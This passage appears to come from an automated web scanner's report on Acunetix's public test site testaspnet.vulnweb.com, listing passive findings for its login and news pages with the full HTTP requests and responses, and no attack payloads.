value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	GET
Parameter
Attack
Evidence	<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13421
Response Body - size: 13,421 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22839
Response Body - size: 22,839 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhb